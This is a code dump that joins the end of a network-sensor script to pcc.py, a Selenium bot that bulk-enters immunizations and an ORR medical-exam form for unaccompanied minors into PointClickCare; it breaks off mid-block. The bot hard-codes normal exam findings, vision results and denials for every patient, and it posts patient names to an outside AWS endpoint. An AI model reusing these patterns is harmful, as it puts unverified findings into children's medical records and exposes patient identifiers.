for j in xrange(i + 2, len(sys.argv)):
value = sys.argv[j]
if os.path.isfile(value):
sys.argv[i + 1] += ",%s" % value
sys.argv[j] = ''
else:
break
print("%s (sensor) #v%s\n" % (NAME, VERSION))
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
parser.add_option("-i", dest="pcap_file", help="open pcap file for offline analysis")
parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
parser.add_option("-q", dest="quiet", action="store_true", help="turn off regular output")
parser.add_option("--console", dest="console", action="store_true", help="print events to console (Note: switch '-q' might be useful)")
parser.add_option("--no-updates", dest="no_updates", action="store_true", help="disable (online) trail updates")
parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
parser.add_option("--profile", dest="profile", help=optparse.SUPPRESS_HELP)
options, _ = parser.parse_args()
read_config(options.config_file)
for option in dir(options):
if isinstance(getattr(options, option), (six.string_types, bool)) and not option.startswith('_'):
config[option] = getattr(options, option)
if options.debug:
config.console = True
config.PROCESS_COUNT = 1
config.SHOW_DEBUG = True
if options.pcap_file:
if options.pcap_file == '-':
print("[i] using STDIN")
else:
for _ in options.pcap_file.split(','):
if not os.path.isfile(_):
exit("[!] missing pcap file '%s'" % _)
print("[i] using pcap file(s) '%s'" % options.pcap_file)
if not config.DISABLE_CHECK_SUDO and not check_sudo():
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
try:
init()
if config.profile:
open(config.profile, "w+b").write("")
cProfile.run("monitor()", config.profile)
else:
monitor()
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
show_final = True
try:
main()
except SystemExit as ex:
show_final = False
if isinstance(get_ex_message(ex), six.string_types):
print(get_ex_message(ex))
os._exit(1)
except IOError:
show_final = False
log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
except Exception:
msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
log_error("\n\n%s" % msg.replace("\r", ""))
print(msg)
finally:
if show_final:
print("[i] finished")
os._exit(0)
|
pcc.py
|
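# pcc.py - Selenium-based automation that bulk-enters immunizations and
# assessment forms into PointClickCare, driven by rows of an Excel sheet
# (data.xlsx) plus a vaccine catalogue (Immunizations.xlsx).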
import time
import tkinter
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
import os
import csv
from datetime import datetime
import time as t
import pandas as pd
from selenium.webdriver.support.ui import Select
import tkinter as tk
import tkinter.ttk as ttk
import tkinter.messagebox
from tkinter import filedialog as fd
from threading import Thread
import traceback
import re
import requests
import socket
import json
# Global Variables
driver = None
patient_data_sheet = None
thread_stopped = False
get_e_timeout = 20
current_users = None
user_name = None
password = None
selected_sheet = ""
name_designation="Juan Garcia MD"
md_do_pa_np="PA"
clinic_or_practice="Trinity Health Services"
vis_date="12/3/2021"
temp_c=""
hr=""
bp=""
rr=""
ht=""
wt=""
no_allergies="Yes"
food="No"
medication="No"
corrected_left_eye=""
corrected_both_eyes=""
uncorrected_right_eye="20/20"
uncorrected_left_eye="20/20"
uncorrected_both_eyes="20/20"
medical_history=""
travel_history="0"
past_medical_history="Denies"
family_history="Denies"
lmp="N/A"
previous_regnancy="N/A"
no_abnormal_findings="Yes"
other_1=""
other_2=""
general_appearance="normal"
heent="normal"
neck="normal"
heart="normal"
lungs="normal"
abdomen="normal"
gu_gyn=""
describe="Deffered"
extremeties="normal"
back_spine="normal"
neurologic="normal"
skin="normal"
describe_concerns=""
mental_health="0"
h15="n"
other_medical="Contact with and (suspected) exposure to COVID-19."
# Strings
specify_travel = "The minor is medically cleared to travel only if all covid quarantine clearance criteria have been met and no other concerns requiring medical follow up and/or specialty follow-up have been identified in subsequent visits."
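# Console logger: prefixes each status message with the current time.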
def update_status(msg):
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
print(current_time + " - " + msg)
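# Launches a visible Chrome session (automation banner suppressed) and opens
# the PointClickCare login page; expects chromedriver.exe in the working
# directory.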
def open_chrome():
global driver
# tkinter.messagebox.showinfo("Information", "Please log into your account using next opening driver. Then click on 'Start' button to start the automation.")
update_status("Opening Chrome..")
options = Options()
options.add_argument("start-maximized")
options.add_experimental_option("excludeSwitches", ["enable-automation"])
options.add_experimental_option('useAutomationExtension', False)
# options.add_argument("user-data-dir=" + os.getcwd() + "/ChromeProfile")
# driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
# Download from https://chromedriver.chromium.org/downloads
driver = webdriver.Chrome("chromedriver.exe", options=options)
update_status("Navigating to CRM..")
driver.get("https://login.pointclickcare.com/home/userLogin.xhtml")
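# The Selenium helpers below share one convention: return False on success
# and True on failure, so call sites read "res = helper(...); if res:
# sendRequest(...)". Errors are printed and reported instead of raised so
# one flaky page does not abort the whole batch.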
def wait_button(d, el, t):
try:
el = WebDriverWait(d, get_e_timeout).until(EC.element_to_be_clickable((t, el)))
return False
except Exception as e:
print(e)
return True
pass
def wait_window(d):
try:
# Wait until a popup window exists. The original passed EC.new_window_is_opened
# uncalled (it requires the pre-click handle list), which made the wait a no-op.
WebDriverWait(d, get_e_timeout).until(lambda drv: len(drv.window_handles) > 1)
return False
except Exception as e:
print(e)
return True
def send_text(d, el, data):
try:
d.find_element(By.ID, el).clear()
d.find_element(By.ID, el).send_keys(data)
return False
except Exception as e:
print(e)
return True
pass
def send_text_name(d, el, data):
try:
d.find_element(By.NAME, el).clear()
d.find_element(By.NAME, el).send_keys(data)
return False
except Exception as e:
print(e)
return True
pass
def send_click_pos(d, el, pos):
try:
d.find_elements(By.ID, el)[pos].click()
return False
except Exception as e:
print(e)
return True
pass
def send_click_pos_by_class(d, el, pos):
try:
d.find_elements(By.CLASS_NAME, el)[pos].click()
return False
except Exception as e:
print(e)
return True
pass
def send_click(d, el):
try:
d.find_element(By.ID, el).click()
return False
except Exception as e:
print(e)
return True
pass
def send_click_name(d, el):
try:
# Bug fix: the original called .click() on the list returned by
# find_elements; a single-element lookup is intended here.
d.find_element(By.NAME, el).click()
return False
except Exception as e:
print(e)
return True
def send_enter(d, el):
try:
d.find_element(By.ID, el).send_keys(Keys.ENTER)
return False
except Exception as e:
print(e)
return True
pass
def click_link(d, el):
try:
d.find_element(By.XPATH, '//a[contains(text(),"' + el + '")]').click()
return False
except Exception as e:
print(e)
return True
pass
def click_link_href(d, el):
try:
d.find_element(By.XPATH, '//a[@href="' + el + '"]').click()
return False
except Exception as e:
print(e)
return True
pass
def click_button_value(d, el):
try:
d.find_element(By.XPATH, '//input[@value="' + el + '"]').click()
return False
except Exception as e:
print(e)
return True
pass
def get_string_date(el):
res = ""
try:
res = el.strftime("%m/%d/%Y")
except:
res = el
pass
return res
def select_window(d, pos):
try:
# switch_to.window works on Selenium 3 and 4; the legacy switch_to_window
# alias used originally was removed in Selenium 4.
d.switch_to.window(d.window_handles[pos])
return False
except Exception as e:
print(e)
return True
def select_menu_name(d, name, value):
try:
s = Select(d.find_element(By.NAME, name))
s.select_by_value(value)
return False
except Exception as e:
print(e)
return True
pass
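# Resets users_not_found.txt to a CSV header line; write_file_data() then
# appends one row per patient that could not be matched.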
def overwrite_file():
try:
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), "users_not_found.txt"), "w") as myfile:
myfile.write("userId,A,name\n")
return False
except Exception as e:
print(e)
return True
pass
def write_file_data(data):
try:
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), "users_not_found.txt"), "a") as myfile:
myfile.write(data)
return False
except Exception as e:
print(e)
return True
pass
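# Looks up a vaccine row from Immunizations.xlsx by its 'Option' column,
# case-insensitively; returns None when no row matches.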
def get_vaccine_by_name(vac_name, imm_list):
for i in range(len(imm_list)):
if imm_list[i]['Option'].lower() == vac_name.lower():
return imm_list[i]
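# Strips the ".0" suffix pandas adds to numeric cells and drops every
# non-alphanumeric character; returns None for non-string input.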
def clean_text(txt):
try:
txt = txt.replace(".0", "")
new_string = ''.join(char for char in txt if char.isalnum())
return new_string
except:
pass
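# Safe accessor for a pandas row / dict: returns "" (after printing the
# error) when the column is missing.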
def getData(obj, name):
try:
return obj[name]
except Exception as e:
print(e)
return ""
def selectSheet(sheet):
global selected_sheet
selected_sheet = sheet
print(selected_sheet)
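# Posts an error/status notification (hostname, subject, message) as JSON
# to an API Gateway endpoint so failures can be monitored remotely.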
def sendRequest(subject, message, error = True):
try:
payload = {
"computer": socket.gethostname(),
"subject": subject,
"message": message,
"error": error,
"bot": "pcc"
}
print(payload)
r = requests.post("https://2qpxr842pk.execute-api.us-east-1.amazonaws.com/Prod/post-sns-data", data=json.dumps(payload))
return payload
except Exception as e:
print(e)
return ""
def main_loop():
# read excel
global driver,patient_data_sheet, current_users, user_name, password, selected_sheet
print("SELECTED SHEET " + selected_sheet)
# Read Immunizations.xlsx Excel file
df = pd.read_excel(os.path.join(os.path.dirname(os.path.abspath(__file__)), "data.xlsx"), sheet_name=selected_sheet)
imm_list = []
for index, row in df.iterrows():
imm_list.append(row)
file_immunizations = pd.read_excel(os.path.join(os.path.dirname(os.path.abspath(__file__)), "Immunizations.xlsx"), sheet_name='Sheet1')
immunizations_list = []
for index, row in file_immunizations.iterrows():
immunizations_list.append(row)
# Loop through patient list
for data in imm_list:
try:
driver.refresh()
t.sleep(2)
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
print("date and time =", dt_string, '>>>>logging in ')
target_user_a = clean_text(str(getData(data,'A#')))
target_user_id = clean_text(str(getData(data,'userId')))
targent_name = getData(data,'First Name') + ' ' + getData(data,'Last Name')
print("Processing - " + target_user_id + "-" + target_user_a + "-" + targent_name)
select_window(driver, 0)
t.sleep(1)
select_window(driver, 0)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Could not switch to main window", True)
break
# overwrite_file()
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Click on search input field
try:
search_select=driver.find_element(By.ID, 'searchSelect')
ActionChains(driver).move_to_element(search_select).click(search_select).perform()
except:
pass
t.sleep(2)
try:
driver.find_element(By.XPATH, '//td[contains(text(),"All Facilities")]').click()
except:
pass
# Click on search input field
# Send Excel name
res = send_text(driver, 'searchField', target_user_id)
if res:
sendRequest(targent_name, "Error: Unable to add text to searchField", True)
break
res = send_enter(driver, 'searchField')
if res:
sendRequest(targent_name, "Error: Unable to send enter key to searchField", True)
break
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# Select pop-up window "Global Resident Search -- All Residents"
t.sleep(5)
select_window(driver, -1)
t.sleep(1)
print("Select pop-up window - Global Resident Search")
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Could not switch pop-up window", True)
break
try:
driver.find_element(By.XPATH, '//a[contains(text(),"Current")]').click()
print("Click Current tab")
except:
pass
try:
driver.find_element(By.XPATH, "//a[@href='/admin/client/clientlist.jsp?ESOLview=Current&ESOLglobalclientsearch=Y']").click();
print("Click Current tab2")
except:
pass
try:
driver.find_element(By.LINK_TEXT, "Current").click()
print("Click Current tab3")
except:
pass
try:
print("Get Found Users Count")
current_users=driver.find_element(By.CLASS_NAME, 'pccTableShowDivider').find_elements(By.TAG_NAME, 'tr')
users_len=len(current_users)
print(users_len)
print(current_users[1].text)
if users_len > 1 and current_users[1].text != "No records found.":
for i in range(1, users_len):
print("Click on user name")
try:
user=current_users[i].find_elements(By.TAG_NAME, 'td')[1].find_element(By.TAG_NAME, 'a')
ActionChains(driver).move_to_element(user).click(user).perform()
t.sleep(5)
except:
# sendRequest(targent_name, "Error: Unable to click user name", True)
break
try:
driver.switch_to.window(driver.window_handles[0])
print("Switch Main Screen")
except:
break
try:
# Legacy Selenium 3 alias; switch_to_window was removed in Selenium 4,
# so on newer drivers this fallback is skipped silently.
driver.switch_to_window(driver.window_handles[0])
print("Switch Main Screen (legacy fallback)")
except:
pass
t.sleep(2)
try:
print("Click on edit button")
driver.find_element(By.XPATH, '//span[contains(text(),"Edit")]').click()
except:
sendRequest(targent_name, "Error: Unable to click on edit button", True)
break
t.sleep(2)
try:
print("Demographics")
driver.find_element(By.XPATH, '//a[contains(text(),"Demographics")]').click()
except:
pass
try:
print("Demographics2")
driver.find_element(By.XPATH, "//a[@href='javascript:editDemographicInfo('nonAdmin',3632088)']").click();
except:
pass
t.sleep(3)
try:
print("Get User A #")
user_a=driver.find_elements(By.NAME, 'clientids')[4]
user_a_value= user_a.get_attribute("value")
print(user_a_value)
#print(user_a.text )
if user_a_value == target_user_a:#213139072-220786141
print("Found target A#")
# Click On Cancel button
try:
driver.find_element(By.XPATH, "//input[@value='Cancel']").click()
except:
pass
t.sleep(3)
## START - USER EDIT
vaccines_list = []
if clean_text(getData(data,'Influenza')).lower() == 'yes':
print('Add Influenza')
vaccines_list.append('Influenza')
if clean_text(getData(data,'Tdap')).lower() == 'yes':
print('Add Tdap')
vaccines_list.append('Tdap')
if clean_text(getData(data,'Td')).lower() == 'yes':
print('Add Td')
vaccines_list.append('Td')
if clean_text(getData(data,'Hepatitis A')).lower() == 'yes':
print('Add Hepatitis A')
vaccines_list.append('Hepatitis A')
if clean_text(getData(data,'Hepatitis B')).lower() == 'yes':
print('Add Hepatitis B')
vaccines_list.append('Hepatitis B')
if clean_text(getData(data,'HPV')).lower() == 'yes':
print('Add HPV')
vaccines_list.append('HPV')
if clean_text(getData(data,'IPV')).lower() == 'yes':
print('Add IPV')
vaccines_list.append('IPV')
if clean_text(getData(data,'Meningicoccal')).lower() == 'yes':
print('Add Meningicoccal')
vaccines_list.append('Meningicoccal')
if clean_text(getData(data,'MMR')).lower() == 'yes':
print('Add MMR')
vaccines_list.append('MMR')
if clean_text(getData(data,'Varicella')).lower() == 'yes':
print('Add Varicella')
vaccines_list.append('Varicella')
if clean_text(getData(data,'SARS-COV-2')).lower() == 'yes':
print('Add SARS-COV-2')
vaccines_list.append('SARS-COV-2')
if clean_text(getData(data,'SARS-COV-2 < 12')).lower() == 'yes':
print('Add SARS-COV-2 < 12')
vaccines_list.append('SARS-COV-2 < 12')
if len(vaccines_list) > 0:
print("Add immunizations")
# Click on Immun tab
res = click_link(driver, "Immun")
if res:
sendRequest(targent_name, "Error: Unable to click on immunizations", True)
pass
try:
immun=driver.find_element(By.XPATH, '/html/body/table[6]/tbody/tr[2]/td/ul/li[6]/a')
ActionChains(driver).move_to_element(immun).click(immun).perform()
except:
sendRequest(targent_name, "Error: Unable to click on immunizations table", True)
pass
t.sleep(2)
# Click on New button
res = click_button_value(driver, "New")
if res:
sendRequest(targent_name, "Error: Unable to click on new button", True)
break
t.sleep(2)
wait_window(driver)
# Select popup window
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
for vacc in vaccines_list:
wait_button(driver, "cancelButton", By.ID)
print("GET immunizations_list " + vacc)
select_vacc = get_vaccine_by_name(vacc, immunizations_list)
# Menu select "Immunization"
t.sleep(1)
print(select_vacc["Name"] + "-" + clean_text(str(select_vacc["Menu val"])))
res = select_menu_name(driver, "immunizationId",clean_text( str(select_vacc["Menu val"])))
if res:
sendRequest(targent_name, "Error: Unable to select menu " + select_vacc["Name"], True)
break
if select_vacc["Search"] == "Yes":
res = click_link_href(driver, "javascript:cvxCodeSearch();")
if res:
sendRequest(targent_name, "Error: Unable to click on search button", True)
break
t.sleep(0.5)
wait_window(driver)
# Select popup window
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
send_text(driver, "searchText", select_vacc["Search Name"])
send_enter(driver, "searchText")
t.sleep(1)
vac_res =driver.find_element(By.CLASS_NAME, 'pccResults').find_elements(By.TAG_NAME, 'tr')
if len(vac_res[1].find_elements(By.TAG_NAME, 'a')) > 0:
vac_res[int(select_vacc["Search Pos"])].find_elements(By.TAG_NAME, 'a')[0].click()
t.sleep(0.5)
select_window(driver, 0)
t.sleep(1)
select_window(driver, 0)
t.sleep(0.5)
select_window(driver, -1)
t.sleep(1)
select_window(driver, -1)
# Menu select "Given"
res = select_menu_name(driver, "consentGiven", "Y")
if res:
sendRequest(targent_name, "Error: Unable to select menu Given", True)
break
t.sleep(0.5)
# Set date of visit
res = send_text(driver, "dateGiven_dummy", get_string_date(getData(data,'Date of visit')))
if res:
sendRequest(targent_name, "Error: Unable to set date of visit", True)
break
# Set notes
notes = select_vacc["Name"] + "\n" + select_vacc["Zone"] + "\n" + "Lot# " + str(select_vacc["Lot#"]) + "\n" + "Exp: " + get_string_date(select_vacc["Exp"]) + "\n" + "Manufacturer: " + select_vacc["Manufacturer"] + "\n" + "VIS Date: " + get_string_date(vis_date) + "\n" + "VIS Given: " + get_string_date(getData(data,'Date of visit')) + "\n" + "Funding: " + select_vacc["Funding"]
res = send_text_name(driver, "notes", notes)
if res:
sendRequest(targent_name, "Error: Unable to set notes", True)
break
# Click on button "Save & New"
res = click_button_value(driver, "Save & New")
if res:
sendRequest(targent_name, "Error: Unable to click on save and new button", True)
break
t.sleep(2)
t.sleep(1)
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
wait_button(driver, "cancelButton", By.ID)
send_click(driver, "cancelButton")
# Todo: Marco Martinez - Click on cancel button
if clean_text(getData(data,'Dose 2 SARS-COV-2')).lower() == 'yes' or clean_text(getData(data,'Dose 2 SARS-COV-2 < 12')).lower() == 'yes':
print("Add SARS-COV-2 Dose 2")
# Click on Immun tab
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
t.sleep(1)
res = click_link(driver, "Immun")
if res:
sendRequest(targent_name, "Error: Unable to click on immunizations link", True)
pass
try:
immun=driver.find_element(By.XPATH, '/html/body/table[6]/tbody/tr[2]/td/ul/li[6]/a')
ActionChains(driver).move_to_element(immun).click(immun).perform()
except:
sendRequest(targent_name, "Error: Unable to click on immunizations table", True)
pass
t.sleep(3)
res = send_click_pos_by_class(driver, "listbuttonred", 0)
if res:
sendRequest(targent_name, "Error: Unable to click on listbuttonred", True)
pass
t.sleep(2)
wait_window(driver)
# Select popup window
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
vaccines_list_dose = []
if clean_text(getData(data,'Dose 2 SARS-COV-2')).lower() == 'yes':
vaccines_list_dose.append('SARS-COV-2')
if clean_text(getData(data,'Dose 2 SARS-COV-2 < 12')).lower() == 'yes':
vaccines_list_dose.append('SARS-COV-2 < 12')
for vacc in vaccines_list_dose:
wait_button(driver, "cancelButton", By.ID)
select_vacc = get_vaccine_by_name(vacc, immunizations_list)
# Menu select "Immunization"
t.sleep(1)
print(select_vacc["Name"] + "-" + clean_text(str(select_vacc["Menu val"])))
if select_vacc["Search"] == "Yes":
res = click_link_href(driver, "javascript:cvxCodeSearch();")
if res:
sendRequest(targent_name, "Error: Unable to click on search link", True)
break
t.sleep(0.5)
wait_window(driver)
# Select popup window
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
res = send_text(driver, "searchText", select_vacc["Search Name"])
if res:
sendRequest(targent_name, "Error: Unable to set search text", True)
break
res = send_enter(driver, "searchText")
if res:
sendRequest(targent_name, "Error: Unable to send enter", True)
break
t.sleep(1)
vac_res =driver.find_element(By.CLASS_NAME, 'pccResults').find_elements(By.TAG_NAME, 'tr')
if len(vac_res[1].find_elements(By.TAG_NAME, 'a')) > 0:
vac_res[int(select_vacc["Search Pos"])].find_elements(By.TAG_NAME, 'a')[0].click()
t.sleep(0.5)
select_window(driver, 0)
t.sleep(1)
select_window(driver, 0)
t.sleep(0.5)
select_window(driver, -1)
t.sleep(1)
select_window(driver, -1)
# Menu select "Given"
res = select_menu_name(driver, "consentGiven", "Y")
if res:
sendRequest(targent_name, "Error: Unable to select menu consentGiven", True)
break
t.sleep(0.5)
# Set date of visit
res = send_text(driver, "dateGiven_dummy", get_string_date(getData(data,'Date of visit')))
if res:
sendRequest(targent_name, "Error: Unable to set date of visit", True)
break
# Set notes
notes = select_vacc["Name"] + "\n" + select_vacc["Zone"] + "\n" + "Lot# " + str(select_vacc["Lot#"]) + "\n" + "Exp: " + get_string_date(select_vacc["Exp"]) + "\n" + "Manufacturer: " + select_vacc["Manufacturer"] + "\n" + "VIS Date: " + get_string_date(vis_date) + "\n" + "VIS Given: " + get_string_date(getData(data,'Date of visit')) + "\n" + "Funding: " + select_vacc["Funding"]
res = send_text_name(driver, "notes", notes)
if res:
sendRequest(targent_name, "Error: Unable to set notes", True)
break
# Click on button "Save & New"
res = click_button_value(driver, "Save & New")
if res:
sendRequest(targent_name, "Error: Unable to click on save & new button", True)
break
t.sleep(2)
t.sleep(1)
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
wait_button(driver, "cancelButton", By.ID)
send_click(driver, "cancelButton")
# Todo: Marco Martinez - Click on cancel button
if clean_text(getData(data,'Initial Medical Form')).lower() == 'yes':
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
print("*Initial Medical Exam Unaccompanied Children's Program Office of Refugee Resettlement (ORR) - V 3 ")
# Click on "Assmnts"
try:
assessment=driver.find_element(By.XPATH, '/html/body/table[6]/tbody/tr[2]/td/ul/li[9]/a')
ActionChains(driver).move_to_element(assessment).click(assessment).perform()
except:
sendRequest(targent_name, "Error: Unable to click on Assmnts", True)
t.sleep(5)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# Click on "New" button
try:
newwww= driver.find_element(By.XPATH, '/html/body/form/table/tbody/tr[1]/td/table/tbody/tr/td[1]/input')
ActionChains(driver).move_to_element(newwww).click(newwww).perform()
except:
sendRequest(targent_name, "Error: Unable to click on new button", True)
break
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Select pop-up window "Reasons for Assessment"
driver.switch_to.window(driver.window_handles[-1])
# Select Assesment
try:
assessment = Select(driver.find_element(By.ID, 'std_assessment'))
# *Initial Medical Exam Unaccompanied Children's Program Office of Refugee Resettlement (ORR) - V 3
assessment.select_by_value('548885')
except:
sendRequest(targent_name, "Error: Unable to select assessment", True)
pass
# Click on "save" button - value="Save"
try:
driver.find_element(By.XPATH, "//input[@value='Save']").click()
except:
sendRequest(targent_name, "Error: Unable to click on save button", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(3)
# Return to main window
driver.switch_to.window(driver.window_handles[0])
t.sleep(3)
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
print("date and time =[", dt_string, ']>>>>Filling forms ')
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section A - General Information")
try:
# A.General Information - a.Name and Designation
driver.find_element(By.ID, 'linkCust_A_1_1').clear()
driver.find_element(By.ID, 'linkCust_A_1_1').send_keys(name_designation)
except:
sendRequest(targent_name, "Error: Unable to set name_designation", True)
pass
try:
driver.find_element(By.ID, 'linkCust_A_1_2').clear()
driver.find_element(By.ID, 'linkCust_A_1_2').send_keys(str(getData(data,'telephone')))
except:
sendRequest(targent_name, "Error: Unable to set telephone", True)
pass
try:
driver.find_element(By.ID, 'linkCust_A_3').clear()
driver.find_element(By.ID, 'linkCust_A_3').send_keys(getData(data,'clinicname') or clinic_or_practice)
except Exception as e:
print(e)
sendRequest(targent_name, "Error: Unable to set clinicname", True)
pass
try:
driver.find_element(By.ID, 'linkCust_A_4').clear()
driver.find_element(By.ID, 'linkCust_A_4').send_keys(getData(data,'Healthcare Provider Street address, City or Town, State'))
except:
sendRequest(targent_name, "Error: Unable to set Healthcare Provider Address", True)
pass
try:
driver.find_element(By.ID, 'linkCust_A_5_dummy').clear()
driver.find_element(By.ID, 'linkCust_A_5_dummy').send_keys(get_string_date(getData(data,'Date of visit')))
except:
sendRequest(targent_name, "Error: Unable to set Date of visit", True)
pass
try:
driver.find_element(By.ID, 'linkCust_A_7').clear()
driver.find_element(By.ID, 'linkCust_A_7').send_keys(getData(data,'Program Name'))
except:
sendRequest(targent_name, "Error: Unable to set Program Name", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section B - History and Physical")
# B.a History and Physical - Allergies
try:
driver.find_elements(By.ID, 'linkCust_B_2')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on Allergies", True)
pass
# B.-4
try:
driver.find_element(By.ID, 'linkCust_B_4').clear()
driver.find_element(By.ID, 'linkCust_B_4').send_keys("20/20")
except:
sendRequest(targent_name, "Error: Unable to set B-4", True)
pass
# B.-4a
try:
driver.find_element(By.ID, 'linkCust_B_4a').clear()
driver.find_element(By.ID, 'linkCust_B_4a').send_keys("20/20")
except:
sendRequest(targent_name, "Error: Unable to set B-4a", True)
pass
# B.-4b
try:
driver.find_element(By.ID, 'linkCust_B_4b').clear()
driver.find_element(By.ID, 'linkCust_B_4b').send_keys("20/20")
except:
sendRequest(targent_name, "Error: Unable to set B-4b", True)
pass
# B.-4c (radio button) - a. Pass
try:
driver.find_elements(By.ID, 'linkCust_B_4c')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on B-4c", True)
pass
# B.-5 (radio button) - a. - Yes
try:
driver.find_elements(By.ID, 'linkCust_B_5')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on B-5", True)
pass
# B.-6 (radio button) - a. - No
try:
driver.find_elements(By.ID, 'linkCust_B_6')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on B-6", True)
pass
# B.-7
try:
driver.find_element(By.ID, 'linkCust_B_7').clear()
driver.find_element(By.ID, 'linkCust_B_7').send_keys("Denies")
except:
sendRequest(targent_name, "Error: Unable to set B-7", True)
pass
# B.-8 (radio button) - a. - No
try:
driver.find_elements(By.ID, 'linkCust_B_8')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on B-8", True)
pass
# B.-9
try:
driver.find_element(By.ID, 'linkCust_B_9').clear()
driver.find_element(By.ID, 'linkCust_B_9').send_keys("Denies")
except:
sendRequest(targent_name, "Error: Unable to set B-9", True)
pass
# B.-10
try:
driver.find_element(By.ID, 'linkCust_B_10').clear()
driver.find_element(By.ID, 'linkCust_B_10').send_keys("The child reports traveling from")
except:
sendRequest(targent_name, "Error: Unable to set B-10", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section C - Review of Systems")
# C.1 - No abnormal Findings
try:
driver.find_element(By.ID, 'linkCust_C_1').click()
except:
sendRequest(targent_name, "Error: Unable to click on C.1", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section D - Physical Examination")
# D.1 - General Appearance - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_1')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.1", True)
pass
# D.2 - HEENT - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_2')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.2", True)
pass
# D.3 - Neck - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_3')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.3", True)
pass
# D.4 - Heart - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_4')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.4", True)
pass
# D.5 - Lungs - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_5')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.5", True)
pass
# D.6 - Abdomen - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_6')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.6", True)
pass
# D.8 - Extremities - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_8')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.8", True)
pass
# D.9 - Back/Spine - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_9')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.9", True)
pass
# D.10 - Neurologic - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_10')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.10", True)
pass
# D.11 - Skin - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_11')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.11", True)
pass
# D.12 - Other
try:
driver.find_element(By.ID, 'linkCust_D_12').clear()
driver.find_element(By.ID, 'linkCust_D_12').send_keys("Whisper test passed")
except:
sendRequest(targent_name, "Error: Unable to set D.12", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section E - Psychosocial Risk")
# E.1 - Mental Health concerns ( ≤3 mos) - Denied, with no obvious sign/symptoms
try:
driver.find_elements(By.ID, 'linkCust_E_1')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on E.1", True)
pass
# E.2 - Mental Health concerns ( ≤3 mos) - Denied, with no obvious sign/symptoms
try:
driver.find_elements(By.ID, 'linkCust_E_2')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on E.2", True)
pass
# E.3 - Mental Health concerns ( ≤3 mos) - Denied, with no obvious sign/symptoms
try:
driver.find_elements(By.ID, 'linkCust_E_3')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on E.3", True)
pass
# E.4a - Nonconsensual Sexual Activity
try:
